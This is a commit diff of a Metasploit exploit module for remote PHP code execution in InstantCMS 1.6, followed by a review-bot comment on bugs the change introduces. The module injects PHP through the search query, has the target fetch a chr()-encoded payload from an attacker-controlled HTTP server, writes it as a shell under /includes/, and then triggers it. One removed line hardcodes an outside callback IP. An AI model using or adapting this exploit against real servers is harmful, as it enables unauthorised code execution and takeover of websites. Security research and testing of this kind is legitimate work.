Update instantcms_exec.rb
parent
dafa333e57
commit
dd876008f9
@ -3,32 +3,31 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'InstantCMS <= 1.6 remote PHP code execution',
|
||||
'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the InstantCMS versions <= 1.6 },
|
||||
'Author' => [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com> or <ricardojba[at]aeiou.pt>' # Metasploit module
|
||||
'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',
|
||||
'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the InstantCMS versions 1.6 },
|
||||
'Author' => [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Jun 26 2013',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "URI path", "/"]),
|
||||
OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -39,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'view' => 'search',
|
||||
'query' => '${echo phpinfo()}'
|
||||
}
|
||||
}, 25)
|
||||
})
|
||||
|
||||
if res
|
||||
if res.body.match(/Build Date/)
|
||||
|
@ -55,9 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("on_request_uri called: #{request.inspect}")
|
||||
#print_status("on_request_uri called: #{request.inspect}")
|
||||
send_response(cli, payload.encoded)
|
||||
#send_response(cli, payload.encoded , { 'Content-Type' => 'text/plain' })
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -68,23 +66,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fname = Rex::Text.rand_text_alpha(3) + ".php"
|
||||
resource_uri = '/' + Rex::Text.rand_text_alpha(3)
|
||||
|
||||
sploit_uri = "http://89.154.97.12:#{datastore['SRVPORT']}#{resource_uri}"
|
||||
#sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"
|
||||
|
||||
sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"
|
||||
|
||||
sploit_fname = fname.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
shell_uri = sploit_uri.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req| on_request_uri(cli, req)
|
||||
exec = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
|
||||
start_service({
|
||||
'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req| on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => resource_uri
|
||||
}})
|
||||
'Path' => resource_uri }})
|
||||
|
||||
print_status("Creating the shell on http://#{rhost}:#{rport}/includes/#{fname}")
|
||||
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'vars_get' =>
|
||||
|
@ -94,10 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
|
||||
File.open('/root/Desktop/metasploit1.html', 'w') { |fd| fd.write(res.body) }
|
||||
|
||||
if res
|
||||
if res
|
||||
if res.code == 200
|
||||
print_status("Shell created successfully.")
|
||||
else
|
||||
|
@ -109,16 +102,13 @@ File.open('/root/Desktop/metasploit1.html', 'w') { |fd| fd.write(res.body) }
|
|||
stop_service
|
||||
end
|
||||
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI'], "includes", fname),
|
||||
})
|
||||
|
||||
|
||||
if res
|
||||
if res
|
||||
if res.code == 200
|
||||
print_status("Requesting the reverse shell.")
|
||||
print_status("Requesting the shell.")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to request the reverse shell.")
|
||||
stop_service
|
||||
|
@ -128,12 +118,9 @@ File.open('/root/Desktop/metasploit1.html', 'w') { |fd| fd.write(res.body) }
|
|||
stop_service
|
||||
end
|
||||
|
||||
|
||||
File.open('/root/Desktop/metasploit12.html', 'w') { |fd| fd.write(res.body) }
|
||||
|
||||
stop_service
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
end
|
||||
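Review bot: The option the new initialize registers is `TARGETURI` (the line printed after `OptString.new('URI', ...)`; this page has lost the +/- markers, so the side is inferred from print order), yet both request builders in the exploit hunks still read the old name — `'uri' => normalize_uri(datastore['URI'])` and `'uri' => normalize_uri(datastore['URI'], "includes", fname)` — and those lines are unchanged context, so after this commit they would resolve to nil. Change both to `normalize_uri(target_uri.path)` (or at least `datastore['TARGETURI']`) so the path option actually reaches the requests. The same print-order reading suggests the rescue at the end of exploit becomes `rescue Exploit::CheckCode::Unknown`; CheckCode values are not exception classes, so that clause cannot catch the connection errors the previous one handled and should be restored to `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout` (with at least a `print_error`, rather than an empty body, so a failed connection is not silently swallowed). The `def exploit` body spans several hunks and its opening lines lie outside the visible ones.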